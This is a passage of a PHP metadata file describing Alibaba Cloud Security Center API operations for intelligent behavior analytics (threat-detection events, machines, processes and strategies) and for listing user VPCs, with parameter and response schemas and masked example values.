=> 1, 'regionId' => '*', 'api' => 'ListUninstallAegisMachines'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListUninstallAegisMachines', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"151F6EB6-D5F3-417A-AF7B-4D84975DB586\\",\\n \\"PageSize\\": 5,\\n \\"TotalCount\\": 44,\\n \\"MachineList\\": [\\n {\\n \\"Uuid\\": \\"6d5b361f-958d-48a8-a9d2-d6e82c1****\\",\\n \\"MachineRegion\\": \\"cn-hangzhou\\",\\n \\"InternetIp\\": \\"120.79.XX.XX\\",\\n \\"VendorName\\": \\"ALIYUN\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"Os\\": \\"linux\\",\\n \\"InstanceId\\": \\"sas-bdrvxb4b****\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"Vendor\\": 0,\\n \\"RegionId\\": \\"cn-shanghai\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListUnknownThreatDetectEvent' => [ 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The filter condition. You can filter by instance name or IP address.', 'type' => 'string', 'required' => false, 'example' => '10.167.XX.XX', 'title' => ''], ], [ 'name' => 'HashKey', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the file.', 'type' => 'string', 'required' => false, 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], ], [ 'name' => 'ProcessPath', 'in' => 'query', 'schema' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => '/test', 'title' => ''], ], [ 'name' => 'ParentProcessPath', 'in' => 'query', 'schema' => ['description' => 'The parent process path.', 'type' => 'string', 'required' => false, 'example' => '/bin/bash', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.', 'type' => 'string', 'required' => false, 'example' => '18b7336e-d469-473b-af83-8e5420f9****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- **1**: Unhandled.'."\n" .'- **2**: Blocked.'."\n" .'- **3**: Ignored.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['type' => 'string', 'default' => 'zh', 'description' => '', 'title' => '', 'example' => ''], ], [ 'name' => 'AnalyzeResult', 'in' => 'query', 'schema' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447******'], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'CurrentPage' => ['description' => 'The page number of the current page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed on each page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Count' => ['description' => 'The number of alerting events displayed on the current page in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The returned data details.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'ProcessPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => '/usr/bin/tar', 'title' => ''], 'ParentProcessPath' => ['description' => 'The parent process path.', 'type' => 'string', 'example' => '/usr/bin/tar'."\n", 'title' => ''], 'HashKey' => ['description' => 'The unique identifier of the file.', 'type' => 'string', 'example' => '30368144069e7567bbb10eabc2******', 'title' => ''], 'CmdChain' => ['description' => 'The process chain.', 'type' => 'string', 'example' => '[{"5133":"pickup -l -t unix -u"},{"1077":"/usr/libexec/postfix/master -w"},{"1":"/usr/lib/systemd/systemd --switched-root --system --deserialize 22"}]', 'title' => ''], 'Count' => ['description' => 'The number of occurrences.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Status' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- **1**: Unhandled.'."\n" .'- **2**: Blocked.'."\n" .'- **3**: Ignored.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Cmdline' => ['description' => 'The process command line.', 'type' => 'string', 'example' => '/usr/sbin/sshd -D', 'title' => ''], 'ParentCmdline' => ['description' => 'The parent command line.', 'type' => 'string', 'example' => '/usr/sbin/sshd -D', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the file.', 'type' => 'string', 'example' => '5b394b54ca632fe51c4ab4a6dbaf****', 'title' => ''], 'Sha256' => ['description' => 'The SHA-256 hash of the file.', 'type' => 'string', 'example' => '3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****', 'title' => ''], 'Pid' => ['description' => 'The process ID.', 'type' => 'string', 'example' => '11', 'title' => ''], 'ParentPid' => ['description' => 'The parent process ID.', 'type' => 'string', 'example' => '12', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'centos****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp of the first occurrence.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'LastTime' => ['description' => 'The timestamp of the most recent occurrence.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Id' => ['description' => 'The event ID.', 'type' => 'string', 'example' => '1', 'title' => ''], 'AnalyzeResult' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'AnalyzeDesc' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'HandleType' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query intelligent behavior analytics alerts', 'summary' => 'Queries the list of intelligent behavior analytics alerting events.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUnknownThreatDetectEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447******\\",\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 149,\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"Count\\": 2\\n },\\n \\"Data\\": [\\n {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"ProcessPath\\": \\"/usr/bin/tar\\",\\n \\"ParentProcessPath\\": \\"/usr/bin/tar\\\\n\\",\\n \\"HashKey\\": \\"30368144069e7567bbb10eabc2******\\",\\n \\"CmdChain\\": \\"[{\\\\\\"5133\\\\\\":\\\\\\"pickup -l -t unix -u\\\\\\"},{\\\\\\"1077\\\\\\":\\\\\\"/usr/libexec/postfix/master -w\\\\\\"},{\\\\\\"1\\\\\\":\\\\\\"/usr/lib/systemd/systemd --switched-root --system --deserialize 22\\\\\\"}]\\",\\n \\"Count\\": 5,\\n \\"Status\\": 1,\\n \\"Cmdline\\": \\"/usr/sbin/sshd -D\\",\\n \\"ParentCmdline\\": \\"/usr/sbin/sshd -D\\",\\n \\"Md5\\": \\"5b394b54ca632fe51c4ab4a6dbaf****\\",\\n \\"Sha256\\": \\"3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****\\",\\n \\"Pid\\": \\"11\\",\\n \\"ParentPid\\": \\"12\\",\\n \\"InstanceName\\": \\"centos****\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"FirstTime\\": 1694576692000,\\n \\"LastTime\\": 1694576692000,\\n \\"Id\\": \\"1\\",\\n \\"AnalyzeResult\\": \\"\\",\\n \\"AnalyzeDesc\\": \\"\\",\\n \\"HandleType\\": \\"\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListUnknownThreatDetectMachine' => [ 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.', 'type' => 'string', 'required' => false, 'example' => 'd2d94e8b-bb25-4744-8004-1e08a53c****', 'title' => ''], ], [ 'name' => 'StudyMode', 'in' => 'query', 'schema' => ['description' => 'The whitelist mode. Valid values:'."\n" ."\n" .'- **hash**: process hash'."\n" .'- **path**: process path', 'type' => 'string', 'required' => false, 'example' => 'hash', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The running status of the machine. Valid values:'."\n" ."\n" .'- **monitoring**: Warning.'."\n" .'- **blocking**: Blocking.'."\n" .'- **studying**: Learning.'."\n" .'- **study_finish**: Learning completed.', 'type' => 'string', 'required' => false, 'example' => 'studying', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The server name or IP address.', 'type' => 'string', 'required' => false, 'example' => 'test-ecs', 'title' => ''], ], [ 'name' => 'StudyTimeStart', 'in' => 'query', 'schema' => ['description' => 'The start of the model creation time range. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1768891966344', 'title' => ''], ], [ 'name' => 'StudyTimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the model creation time range. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1768891966346', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX'], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The returned data.', 'type' => 'array', 'items' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'StudyStartTime' => ['description' => 'The timestamp when learning started.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766988192', 'title' => ''], 'ProcessCount' => ['description' => 'The number of processes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Status' => ['description' => 'The running status of the machine. Valid values:'."\n" ."\n" .'- **monitoring**: Warning.'."\n" .'- **blocking**: Blocking.'."\n" .'- **studying**: Learning.', 'type' => 'string', 'example' => 'studying', 'title' => ''], 'StudyMode' => ['description' => 'The whitelist mode. Valid values:'."\n" ."\n" .'- **hash**: process hash'."\n" .'- **path**: process path', 'type' => 'string', 'example' => 'hash', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => '12', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'StudyRemainDays' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'EffectDays' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'PluginStatus' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'MaliciousProcessCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'NormalEventCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query machines for intelligent behavior analytics', 'summary' => 'Queries the list of machines for intelligent behavior analytics.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 10\\n },\\n \\"Data\\": [\\n {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"StudyStartTime\\": 1766988192,\\n \\"ProcessCount\\": 1,\\n \\"Status\\": \\"studying\\",\\n \\"StudyMode\\": \\"hash\\",\\n \\"InstanceName\\": \\"12\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"StudyRemainDays\\": 0,\\n \\"EffectDays\\": 0,\\n \\"PluginStatus\\": \\"\\",\\n \\"MaliciousProcessCount\\": 0,\\n \\"NormalEventCount\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'ListUnknownThreatDetectProcess' => [ 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'ProcessPath', 'in' => 'query', 'schema' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => '/bin/rm', 'title' => ''], ], [ 'name' => 'Md5', 'in' => 'query', 'schema' => ['description' => 'The MD5 value of the file.', 'type' => 'string', 'required' => false, 'example' => '0552c44e243abdea1729d4507bce****', 'title' => ''], ], [ 'name' => 'Sha256', 'in' => 'query', 'schema' => ['description' => 'The SHA-256 value of the file.', 'type' => 'string', 'required' => false, 'example' => 'f204693a7d2ce99d6c4434e550d985ee1c7be7cb5dd9a76094369af0d2******', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.', 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number to return.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Path', 'in' => 'query', 'schema' => ['description' => 'The file path.', 'type' => 'string', 'required' => false, 'example' => '/etc/test', 'title' => ''], ], [ 'name' => 'FirstTimeStart', 'in' => 'query', 'schema' => ['description' => 'The start of the time range for the first detection, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1768891966344', 'title' => ''], ], [ 'name' => 'FirstTimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the time range for the first detection, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1768891966345', 'title' => ''], ], [ 'name' => 'AnalyzeResult', 'in' => 'query', 'schema' => ['description' => 'The analysis result. Valid values:'."\n" ."\n" .'- **black**: abnormal process'."\n" ."\n" .'- **white**: normal process', 'type' => 'string', 'required' => false, 'example' => 'white', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The server name or IP address.', 'type' => 'string', 'required' => false, 'example' => '172.20.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'title' => '', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***'], 'PageInfo' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '83', 'title' => ''], 'CurrentPage' => ['description' => 'The current page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'string', 'example' => '2', 'title' => ''], ], 'description' => 'The pagination information.', 'title' => '', 'example' => '', ], 'Data' => [ 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ProcessPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => '/usr/bin/tar', 'title' => ''], 'Sha256' => ['description' => 'The SHA-256 hash of the file.', 'type' => 'string', 'example' => '3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the file.', 'type' => 'string', 'example' => '5b394b54ca632fe51c4ab4a6dbaf****', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp of the first occurrence.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Remark' => ['description' => 'Remarks about the process.', 'type' => 'string', 'example' => 'safe process', 'title' => ''], 'ProcessId' => ['description' => 'The process ID.', 'type' => 'string', 'example' => '2025031506350619216822625103151158982', 'title' => ''], 'AnalyzeResult' => ['description' => 'The analysis result. Valid values:'."\n" ."\n" .'- **black**: A malicious process.'."\n" ."\n" .'- **white**: A normal process.'."\n" ."\n" .'- **abnormal**: An abnormal process.', 'type' => 'string', 'example' => 'white', 'title' => ''], 'ExplanationZh' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'ExplanationEn' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'description' => 'The details of a process.', 'title' => '', 'example' => '', ], 'description' => 'An array of process details.', 'title' => '', 'example' => '', ], ], 'title' => '', 'description' => 'The response data.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'ListUnknownThreatDetectProcess', 'summary' => 'Retrieve the list of processes from unknown threat detections.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUnknownThreatDetectProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\",\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 83,\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"Count\\": \\"2\\"\\n },\\n \\"Data\\": [\\n {\\n \\"ProcessPath\\": \\"/usr/bin/tar\\",\\n \\"Sha256\\": \\"3a6fed5fc11392b3ee9f81caf017b48640d7458766a8eb0382899a605b41****\\",\\n \\"Md5\\": \\"5b394b54ca632fe51c4ab4a6dbaf****\\",\\n \\"FirstTime\\": 1694576692000,\\n \\"Remark\\": \\"safe process\\",\\n \\"ProcessId\\": \\"2025031506350619216822625103151158982\\",\\n \\"AnalyzeResult\\": \\"white\\",\\n \\"ExplanationZh\\": \\"\\",\\n \\"ExplanationEn\\": \\"\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListUnknownThreatDetectStrategy' => [ 'summary' => 'Lists the strategies for intelligent behavior analytics.', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The strategy name.', 'type' => 'string', 'required' => false, 'example' => 'strategy****', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The strategy ID.', 'type' => 'string', 'required' => false, 'example' => '210****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number for a paginated query.', 'type' => 'string', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return per page.', 'type' => 'string', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'StudyMode', 'in' => 'query', 'schema' => ['description' => 'The whitelist mode. Valid values:'."\n" ."\n" .'- **hash**: process hash'."\n" ."\n" .'- **path**: process path', 'type' => 'string', 'required' => false, 'example' => 'hash', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'title' => '', 'example' => '898F7AA7-CECD-5EC7-AF4D-664C601B****'], 'Data' => [ 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The strategy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The strategy name.', 'type' => 'string', 'example' => 'test****', 'title' => ''], 'AssetSelectionType' => ['description' => 'The asset selection identifier.', 'type' => 'string', 'example' => 'UNKNOWN_THREAT_DETECT_CONFIG_****', 'title' => ''], 'StudyMode' => ['description' => 'The whitelist mode. Valid values:'."\n" ."\n" .'- **hash**: process hash'."\n" ."\n" .'- **path**: process path', 'type' => 'string', 'example' => 'hash', 'title' => ''], 'DurationDaysAfterInit' => ['description' => 'The duration, in days, of the learning phase after model creation.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'DurationDaysAfterStop' => ['description' => 'The number of consecutive days without new process detections before the learning phase automatically ends.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MachineCount' => ['description' => 'The number of servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => 'A strategy.', 'title' => '', 'example' => '', ], 'description' => 'An array of strategies.', 'title' => '', 'example' => '', ], 'PageInfo' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of matching entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], ], 'description' => 'The pagination information.', 'title' => '', 'example' => '', ], ], 'title' => '', 'description' => 'The response schema.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'ListUnknownThreatDetectStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUnknownThreatDetectStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"898F7AA7-CECD-5EC7-AF4D-664C601B****\\",\\n \\"Data\\": [\\n {\\n \\"Id\\": 1,\\n \\"Name\\": \\"test****\\",\\n \\"AssetSelectionType\\": \\"UNKNOWN_THREAT_DETECT_CONFIG_****\\",\\n \\"StudyMode\\": \\"hash\\",\\n \\"DurationDaysAfterInit\\": 1,\\n \\"DurationDaysAfterStop\\": 1,\\n \\"MachineCount\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"Count\\": 20,\\n \\"TotalCount\\": 69\\n }\\n}","type":"json"}]', ], 'ListUserVpc' => [ 'summary' => 'Retrieves VPC data for the user in a specified region by using the third-party image repository integration feature of Container Asset in Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'K8sRegionId', 'in' => 'query', 'schema' => ['description' => 'The region.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C619F37', 'title' => ''], 'UserVpcInfos' => [ 'description' => 'The list of VPC information.', 'type' => 'array', 'items' => [ 'description' => 'The VPC information.', 'type' => 'object', 'properties' => [ 'CreationTime' => ['description' => 'The creation time.', 'type' => 'string', 'example' => '2023-03-30T07:16:02Z', 'title' => ''], 'VpcName' => ['description' => 'The name of the VPC.', 'type' => 'string', 'example' => 'Vpc-1', 'title' => ''], 'Status' => ['description' => 'The status of the VPC. Valid values:'."\n" ."\n" .'- **Pending**: being configured.'."\n" .'- **Available**: available.', 'type' => 'string', 'example' => 'Available', 'title' => ''], 'VpcId' => ['description' => 'The ID of the VPC.', 'type' => 'string', 'example' => 'vpc-bp1qpo0kug3a20qqe****', 'title' => ''], 'VRouterId' => ['description' => 'The ID of the VPC router.', 'type' => 'string', 'example' => 'vrt-bp1jcg5cmxjbl9xgc****', 'title' => ''], 'CidrBlock' => ['description' => 'The IPv4 CIDR block of the VPC.', 'type' => 'string', 'example' => '192.168.XXX.XXX/16', 'title' => ''], 'Description' => ['description' => 'The description of the VPC.', 'type' => 'string', 'example' => 'This is my VPC.', 'title' => ''], 'Default' => ['description' => 'Indicates whether the VPC is the default VPC in the region. Valid values:'."\n" ."\n" .'- **true**: yes.'."\n" .'- **false**: no.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ModifyTime' => ['description' => 'The modification time.', 'type' => 'string', 'example' => '2023-03-30T07:16:02Z', 'title' => ''], 'RegionId' => ['description' => 'The region.', 